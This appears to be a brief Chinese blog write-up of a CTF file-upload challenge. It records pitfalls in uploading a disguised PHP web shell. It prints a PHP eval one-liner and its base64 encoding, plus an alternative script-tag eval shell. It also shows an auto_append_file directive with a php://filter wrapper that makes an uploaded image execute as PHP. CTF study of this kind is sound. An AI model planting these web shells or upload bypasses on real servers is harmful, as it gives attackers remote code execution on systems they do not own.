CTF2-funny_upload
踩坑点:
-
上传shell.png的时候,是<二进制图片数据>+base64编码后的木马
这样当php_value auto_append_file "php://filter/convert.base64-decode/resource=1.jpg"发力的时候,base64decode的是二进制图片数据加上base64编码后的木马数据,解码之后的内容很有可能不再是php一句话木马了! -
在BURP中对一句话木马进行base64编码的时候,忘记加一层URLencode了
<?php @eval($_POST[4])?>->base64编码 -> PD9waHAgQGV2YWwoJF9QT1NUWzRdKT8+
注意,编码后末尾有一个+,这是HTTP不安全的,会被误认为是空格的URL编码的结果
这样服务器收到的结果会把+变为空格。所以应该对编码后的内容再加一层URL编码
知识点:
<script language="php">eval($_POST['shell']);</script>
和php短标签在php7.0.0版本被废除了
posted on 2026-08-06 22:49 misaki%20mei 阅读(10) 评论(0) 收藏 举报
浙公网安备 33010602011771号